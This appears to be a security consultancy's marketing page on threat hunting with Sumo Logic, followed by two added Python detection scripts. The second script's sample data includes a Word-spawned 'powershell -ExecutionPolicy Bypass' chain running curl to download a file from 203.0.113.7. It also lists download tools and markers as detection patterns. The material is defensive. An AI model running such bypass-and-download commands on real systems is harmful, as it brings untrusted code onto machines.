Vulnerability Threat Hunting With Sumo Logic

Have Sumo Logic?

If the answer is yes, read on.

Ever wondered how the vulnerability assessment process actually works? Or, better still, how to respond to vulnerability threats in a multi-vendor security environment when you have a tool like Sumo Logic at hand?

Here is how.

A vulnerability is published. Customers whose existing security solutions and vendors roll out automated patches get it resolved for them. In reality, though, not every security solution automatically resolves a vulnerability. Many don't. It depends on the type of vulnerability and its complexity.

How can our company help?

  • We can help reduce risk in your environment by visualizing potential threats in Sumo Logic dashboards, and by helping you evaluate and analyze the latest vulnerabilities that affect your existing applications and devices.
  • Many of our customers already have security solutions in place, yet lack clarity on the actionable steps needed to resolve vulnerability-related issues.
  • With Sumo Logic we can create custom queries that keep tabs on the most critical vulnerabilities.  We can review each of your existing security solutions to see whether it can be integrated with Sumo Logic, and create dedicated alerts that identify the problem and tie it to the resolution steps associated with the vulnerability.
  • We can check threat-group forums for your critical applications and devices, analyze vendor recommendations to learn what the symptoms of exploitation are, and map the necessary indicators into Sumo Logic, so that you are notified when a vulnerability is being exploited.

Use Case example:

Let’s pretend your Pulse Secure appliance has become vulnerable due to the latest vulnerability.  As the customer, you would like someone to analyze what the fix is and provide the recommendations needed to implement it.  Our company can help you integrate the fix and determine whether the vulnerability is being actively exploited.  We would use Sumo Logic to identify the relevant log patterns per Pulse Secure’s vendor recommendation and notify you if the vulnerability is being exploited or actively scanned for and targeted.

Often, when a vulnerability is discovered, our customers already know about it from subscriber feeds or other sources. Knowing is one thing; fixing the vulnerability-related problem is another.

What would the typical fix be?

Sometimes customers upgrade the appliance or application to address the vulnerability; other times they isolate the affected appliance from the network.

Why DBA Binary Fusion?

There are simply too many vendors to keep track of, and too many critical applications to monitor.  Our company has specialized Sumo Logic monitoring experts, other network and application monitoring experts, and security professionals grouped together to help your company identify vulnerabilities and monitor your existing environment.

How exactly does our service work?

We provide two types of security service: reactive and proactive vulnerability threat hunting.

Here is how our vulnerability threat hunting works reactively 

  • We gather the list of applications you need to defend (start with the most critical ones as the priority) and subscribe to the watch lists associated with each application and its dependencies (for example, the vendors who support the application, appliance or device).  We rely on your existing vulnerability scanning solution, such as Nessus, Qualys, Retina or another vulnerability assessment tool, or help you pick the right scanning solution for your organization, to be managed directly by your existing IT security team.
  • When we learn what the vulnerability is about, we analyze the vendor recommendations to see what the recommended actions are.  Our company augments your existing IT security team and helps with the heavy lifting.
  • When a vulnerability is discovered, customers usually begin working with their internal teams to resolve it, but the vendor’s recommendations for fixing it can be quite extensive: applying patches, verifying hash values, upgrading systems, checking whether other systems are impacted, creating alerts to see whether the system is still being exploited, and so on, just to establish whether the system or application is vulnerable while exercising due care.  (After all, if customers do not perform their due diligence, that will not be kindly reflected in a security audit.)

So how exactly can DBA Binary Fusion help customers?

Our company can help by sniffing out threats in your environment.  We review the vulnerability, see what the vendor recommends, and work with your existing IT team to notify them and provide security recommendations that reduce your company’s risk.

What Kind Of Security Recommendations?

  • To better understand what kind of recommendation, take the Pulse Secure vulnerability use case.  Say a vulnerability was discovered in the Pulse Secure appliance and your IT team became aware of it, whether notified by the vendor, by a watchlist or by some other method.
  • DBA Binary Fusion consultants would then analyze the vulnerability and its level of criticality in your environment.  For example, if you have an AD LDAP service enabled but are not yet using LDAPS, and the vulnerability happens to be related to LDAP, we would recommend updating the appliance to use LDAPS.
  • That is just one example of a security recommendation.  In fact, many such recommendations are already provided by the scanning tools themselves; we simply reinforce the need for the customer to make sure they get executed and not forgotten.
  • One way of doing this is consistent reporting, the kind we can keep track of by creating dedicated Sumo Logic dashboards that track multiple types of vulnerabilities by tier and characteristics.
  • Our Sumo Logic security subject matter experts can create dedicated dashboards to help you keep track of vulnerabilities.
  • Additionally, after analyzing a vulnerability our consultants can create an alert and a dedicated dashboard that track the risks and threats associated with it, so that your internal IT teams can view these risks grouped at the operational, technical or executive level.
  • Visualizing vulnerabilities is only a small subset of our service offerings.  In addition to visualizing your riskiest vulnerabilities and grouping them by device and application type, we write specific threat hunting queries for the distinct signatures of the vulnerability.
  • The very same queries are used to notify customers when their systems or applications are being targeted.

How does the threat hunting service really work?

  • We analyze the recommendations from the vendors of your applications.
  • For example, a vendor recommendation may amount to watching for specific public IP addresses that are exploiting the vulnerability.  In that case we would recommend turning on additional logging on the Pulse Secure appliances, for example, and then create queries in Sumo Logic that capture the presence of those addresses, scored by rarity and other characteristics.
  • We also have AI and ML subject matter experts who can assist in building AI and ML models that capture specific network traffic behavior, helping customers identify specific issues quicker.
  • We build custom models based on the patterns associated with the specific vulnerability.
  • We visualize this pattern, or multiple patterns, in dashboards.
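The Python script below is an added example for this page (it is not DBA Binary Fusion’s code, and the line format is not Pulse Secure’s real syslog format). It shows the shape of the query described in the bullets above: match access-log source addresses against a vendor-published indicator list, and separately score sources that are new to the environment and only ever hit the login page without authenticating. The key=value line format, the indicator list, the baseline of known addresses, the hit threshold and the Sumo Logic search shown in the comment are all constructed assumptions.

```python
"""Hunt a VPN appliance's access logs for a published indicator list and for
rare, never-authenticated sources.

Added example; not DBA Binary Fusion's or Pulse Secure's code. The key=value
line format, the indicator list, the baseline of known addresses and the
threshold are constructed assumptions. Real Pulse Secure syslog fields
differ and must be parsed per the vendor's documentation.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample lines, one access event per line (assumption).
SAMPLE_LOG = """\
2021-04-20T08:01:02Z vpn01 src=198.51.100.23 user=alice path=/login status=200
2021-04-20T08:01:09Z vpn01 src=198.51.100.23 user=alice path=/home status=200
2021-04-20T08:02:14Z vpn01 src=203.0.113.7 user=- path=/login status=200
2021-04-20T08:02:15Z vpn01 src=203.0.113.7 user=- path=/login status=302
2021-04-20T08:05:30Z vpn01 src=192.0.2.99 user=- path=/login status=200
2021-04-20T08:06:00Z vpn01 src=198.51.100.23 user=alice path=/home status=200
2021-04-20T08:07:45Z vpn01 src=203.0.113.50 user=bob path=/login status=200
this line is malformed and is skipped by the parser
"""

# Indicator list as a vendor advisory or ISAC feed might publish it (constructed).
IOC_IPS = {"203.0.113.7", "203.0.113.77"}
# Source addresses observed during an earlier baseline window (constructed).
KNOWN_IPS = {"198.51.100.23", "203.0.113.50"}

# The indicator-match signal expressed as a Sumo Logic search (approximate
# syntax; an assumption, not something taken from the page):
#   _sourceCategory=vpn/pulse | parse "src=* " as src_ip
#   | where src_ip in ("203.0.113.7", "203.0.113.77") | count by src_ip

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) src=(?P<src>\S+) user=(?P<user>\S+) "
    r"path=(?P<path>\S+) status=(?P<status>\d+)$"
)


def parse_line(line):
    """Parse one access-log line; return None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["status"] = int(rec["status"])
    return rec


def hunt(log_text, ioc_ips, known_ips, rare_max=2):
    """Return one finding per suspicious source address, IOC matches first.

    A source is reported when it matches the indicator list, or when at least
    two weaker behavioural signals coincide: a single new address is normal
    for a VPN, but a new address that only hits the login page a couple of
    times and never authenticates is worth a look.
    """
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    hits = Counter(r["src"] for r in records)
    first_seen = {}
    users = defaultdict(set)
    for r in records:
        first_seen.setdefault(r["src"], r["ts"])
        users[r["src"]].add(r["user"])

    findings = []
    for ip, n in hits.items():
        reasons = []
        if ip in ioc_ips:
            reasons.append("ioc_match")             # published indicator
        if ip not in known_ips:
            reasons.append("new_source")            # absent from baseline window
        if n <= rare_max and users[ip] == {"-"}:
            reasons.append("rare_unauthenticated")  # few hits, never logged in
        if "ioc_match" in reasons or len(reasons) >= 2:
            findings.append({
                "src": ip,
                "hits": n,
                "first_seen": first_seen[ip].isoformat(),
                "reasons": reasons,
            })
    # Indicator matches outrank behavioural signals; earliest first-seen next.
    findings.sort(key=lambda f: ("ioc_match" not in f["reasons"], f["first_seen"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG, IOC_IPS, KNOWN_IPS):
        print(finding)
```

Run stand-alone it reports 203.0.113.7 (indicator match, new, unauthenticated) and 192.0.2.99 (new and unauthenticated, no indicator match); the known, authenticated sources are not reported. The baseline set is what turns a plain indicator match into a rarity query: in production it would be the distinct source addresses from a longer lookback window rather than a hard-coded set.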

How does the proactive vulnerability threat hunting service work?

When it comes to proactively securing your company’s environment, it is important to consider the entire OSI reference model, layer 1 through layer 7, and to secure every single layer.  That is precisely what DBA Binary Fusion helps customers do.

We do this by taking a best-practices, multi-vendor approach.

  • When engaging with a customer, we analyze critical applications and systems, then identify their dependencies and the KPIs that keep the business moving.  During the engagement we review the customer’s environment and perform an environment assessment, identifying the vendors who support each application, system and service.  We then analyze the vendor’s recommended security practices and see whether we can visualize threats or potential risks by following the MITRE ATT&CK knowledge base, mapping out the misconfigurations that may result in increased risk.
  • For example, developers sometimes run PowerShell scripts that contain specific curl commands.  Depending on the level of logging, some of these curl commands can be spotted without any deep packet inspection.  Although some are easy to spot, depending on the customer’s environment, in many cases they are very difficult to spot, and almost impossible if no proper monitoring is configured in the customer’s environment.
  • Our company helps customers uncover these blind spots, and helps them identify the most common security queries that make sense to produce in Sumo Logic for the customer’s environment architecture.
  • That means we actually analyze the customer’s architecture and see how data is secured in transit and at rest.
  • We look at what agent-based and agentless monitoring tools the customer has.
  • If we see a visibility issue (no distributed tracing, no logging, no appropriate devices in between to increase security and visibility), we provide our recommendations and help customers reduce costs, either by helping them pick the right security monitoring solution for their environment, by working with the existing environment, or by developing a dedicated solution based on the customer’s needs.
  • Many customers looking for proactive security services already have an in-house security team, system administrators and an enterprise team to tackle complicated integrations with security vendors.  Yet many customers simply don’t have time to hunt for the most probable threat signatures that matter most to them, because each application has its own complexity and its own set of functions, with many individual sub-functions and dependencies, some of which carry higher than usual risk and some of which don’t.
  • In fact, we find that many customers have already invested in a specific tool such as DarkTrace, but need an additional level of verification of whether a specific access request from an individual IP is legitimate.  In many cases that determination requires multiple vendors, jumping through hoops between one vendor and another just to see whether a request is legitimate.  Our company can unify threat intel information from multiple data sources and vendors into a single Sumo Logic dashboard, helping analysts make informed decisions about what should be looked into thoroughly and what should not.
  • Our company can review not only what is inside the packet header to tell you whether something is legitimate; we can go beyond the header, look at system processes, and ingest that information into Sumo Logic, making it possible to detect issues at both the packet-header level and the system level, something many of our customers are looking for.
  • Many customers also want to see the chaining of events: the user executes a command, then types another command, then runs a script, and that script causes a further action, which results in yet another action.  With the help of DBA Binary Fusion automation experts, we can capture internal processes and visualize them side by side with packet header details, helping customers stay secure.
  • There are so many PowerShell commands, Windows commands and Linux CLI or shell commands that can be the source of a malicious attempt to do something bad.  Why not capture these attempts, why not visualize them, and why not display them side by side with the malicious attempts discovered in the packet header?
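The Python script below is an added example for this page, not DBA Binary Fusion’s code. It covers two of the bullets above: the PowerShell-script-runs-curl pattern, and the chaining of process events joined side by side with network (packet header) events. It reconstructs each process’s ancestry chain from parent PIDs, flags download tools that have a PowerShell ancestor, and attaches the outbound connection that process made within a short window. The event schemas, host names, PIDs, command lines and addresses are all constructed; in practice the process events would come from endpoint telemetry such as EDR or Sysmon process-creation events and the connection events from firewall/flow logs or the endpoint’s own network events, both ingested into Sumo Logic.

```python
"""Reconstruct process ancestry chains and join them to network connections.

Added example; not DBA Binary Fusion's code. Event schemas, hosts, PIDs,
command lines and addresses are constructed assumptions.
"""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Tools and command fragments that fetch content from the network (assumption).
DOWNLOAD_TOOLS = {"curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# RFC 1918 only; extend with the site's own address plan.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _t(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def _proc(host, time, pid, ppid, image, cmdline):
    return {"host": host, "time": _t(time), "pid": pid, "ppid": ppid,
            "image": image, "cmdline": cmdline}


def _conn(host, time, pid, dst_ip, dst_port):
    return {"host": host, "time": _t(time), "pid": pid, "dst_ip": dst_ip, "dst_port": dst_port}


# Constructed process-creation events. ws01 and ws02 both have a PID 100:
# process identity is (host, pid), never the pid alone.
PROCESS_EVENTS = [
    _proc("ws01", "2021-04-20T09:00:00Z", 100, 1, "explorer.exe", "explorer.exe"),
    _proc("ws01", "2021-04-20T09:01:00Z", 200, 100, "WINWORD.EXE", "WINWORD.EXE report.docx"),
    _proc("ws01", "2021-04-20T09:01:05Z", 300, 200, "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\dev\build.ps1"),
    _proc("ws01", "2021-04-20T09:01:07Z", 400, 300, "curl.exe",
          r"curl.exe -s http://203.0.113.7/tool.zip -o C:\Users\dev\tool.zip"),
    _proc("ws01", "2021-04-20T09:02:00Z", 500, 100, "powershell.exe", "powershell.exe Get-Service"),
    _proc("ws01", "2021-04-20T09:03:00Z", 600, 100, "cmd.exe", "cmd.exe"),
    _proc("ws01", "2021-04-20T09:03:02Z", 700, 600, "curl.exe", "curl.exe https://intranet.example/health"),
    _proc("ws02", "2021-04-20T09:04:00Z", 100, 1, "explorer.exe", "explorer.exe"),
    _proc("ws02", "2021-04-20T09:04:10Z", 800, 100, "powershell.exe",
          'powershell.exe -c "Invoke-WebRequest https://updates.example.net/agent.msi -OutFile agent.msi"'),
]

# Constructed network-connection events (the packet-header side of the join).
NET_EVENTS = [
    _conn("ws01", "2021-04-20T09:01:08Z", 400, "203.0.113.7", 80),
    _conn("ws01", "2021-04-20T09:03:03Z", 700, "10.20.30.5", 443),
    _conn("ws02", "2021-04-20T09:04:11Z", 800, "192.0.2.40", 443),
    # Same host and PID as the first entry, minutes later: PID reuse, not the
    # same process. The time window in correlate() keeps it out of the join.
    _conn("ws01", "2021-04-20T09:10:00Z", 400, "198.51.100.9", 443),
]


def build_chain(procs, pid):
    """Walk ppid links back to the root; returns image names root-first."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)                     # guard against ppid cycles in bad data
        chain.append(procs[pid]["image"])
        pid = procs[pid]["ppid"]
    return chain[::-1]


def is_download(proc):
    cmd = proc["cmdline"].lower()
    return proc["image"].lower() in DOWNLOAD_TOOLS or any(m in cmd for m in DOWNLOAD_MARKERS)


def is_external(ip):
    return not any(ip_address(ip) in net for net in INTERNAL_NETS)


def correlate(process_events, net_events, window=timedelta(seconds=30)):
    """Flag download activity with a PowerShell ancestor and attach the
    connection the same (host, pid) made within `window` of process start."""
    by_host = {}
    for e in process_events:
        by_host.setdefault(e["host"], {})[e["pid"]] = e

    findings = []
    for e in process_events:
        if not is_download(e):
            continue
        chain = build_chain(by_host[e["host"]], e["pid"])
        if not any(img.lower() in SCRIPT_HOSTS for img in chain):
            continue                      # curl from an interactive cmd.exe is a different pattern
        conns = [n for n in net_events
                 if n["host"] == e["host"] and n["pid"] == e["pid"]
                 and timedelta(0) <= n["time"] - e["time"] <= window]
        dst = f'{conns[0]["dst_ip"]}:{conns[0]["dst_port"]}' if conns else None
        findings.append({"host": e["host"], "chain": " > ".join(chain),
                         "cmdline": e["cmdline"], "dst": dst,
                         "external": bool(conns) and is_external(conns[0]["dst_ip"])})
    return findings


if __name__ == "__main__":
    for finding in correlate(PROCESS_EVENTS, NET_EVENTS):
        print(finding)
```

Run stand-alone it produces two findings: on ws01 the chain explorer.exe > WINWORD.EXE > powershell.exe > curl.exe with its connection to 203.0.113.7:80, and on ws02 a PowerShell process whose own command line does the download, with its connection to 192.0.2.40:443. The curl run from an interactive cmd.exe and the administrator’s Get-Service session are not reported, and the later connection that reuses PID 400 is not joined to the earlier curl. Joining on (host, pid) inside a tight time window is the point of the example: a pid alone is neither unique across hosts nor stable over time.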

There are simply too many Why Nots.  Let these “Why Nots” be no longer, with the help of DBA Binary Fusion’s proactive consulting services.

Contact us for more info.